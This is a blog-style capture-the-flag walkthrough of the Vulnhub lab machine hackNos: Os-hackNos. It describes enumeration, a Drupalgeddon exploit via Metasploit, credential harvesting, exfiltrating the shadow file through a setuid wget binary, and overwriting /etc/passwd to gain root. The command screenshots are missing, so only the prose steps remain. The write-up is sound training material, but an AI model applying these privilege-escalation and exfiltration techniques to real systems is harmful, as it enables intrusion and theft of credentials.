hackNos: Os-hackNos Walkthrough

It's been a while since I've played on Vulnhub and there are a ton of new machines.  In fact, I just saw a stat that showed this is the first year where there have been over 100 submissions.  I guess I've got a lot of catching up to do -- or not.  Anyway, it's the holiday weekend and I have some time to kill so I went to see what was new and hackNos is one of the first few.

This box is fairly straightforward as long as you don't get bogged down on any particular avenue.  It's also possible to get the root flag without actually becoming root but I couldn't let that stand so I rooted it as well.  More on that in a moment. 

First, we kick off with Nmap:





Not much here, port 80 is our likely entry. 

Just to make sure we're covering all our bases, we toss the FQDN and IP into our hosts file. 

We move to the web:





The stock Apache page. 

Let's see what Gobuster can uncover:





Drupal! 

Let's see what the web has to offer:





Scanning with Droopescan:





I'm pretty sure this version is vulnerable to Drupalgeddon:





Firing up Metasploit, we get our low privilege shell.

Moving to the command line and cleaning up the environment:




Searching around, we find the home direction for James and the user flag.  We also see that James can sudo su:





Checking out the web directory, we find a random file:





That appears to be base64 encoded, let's decode:





I've seen this type of output but I can't recall exactly what it's called. 

More on that in a moment.  First, let's get the Drupal DB credentials:





And the hashes in MySQL:





I try to make some use of those credentials but don't get anywhere. 

Moving back to the encoded nonsense:





When we decode, we get:





That's a red herring or something didn't work as planned.  I assume the former because I couldn't login as James with that password. 

Moving along...

Performing our typical enumeration, we uncover an unusual setuid binary:





With wget, we can retrieve files and we can put files. 

First, let's get the shadow file:





With our handler setup:





No luck on cracking those with hashcat.

As I mentioned, if the goal is the read the root flag, we can do that without getting root:





With our handler setup:





Technically, that's game over but I'm not happy with that ending.  To get a proper root, we can replace the passwd file. First, we need to create our password:





With our own passwd file, we add the bottom entry with our newly created password:





After tossing that somewhere where we can retrieve it with wget:




We replace the file, su to our new user and we're root.  Once again, we read the root flag for a proper root.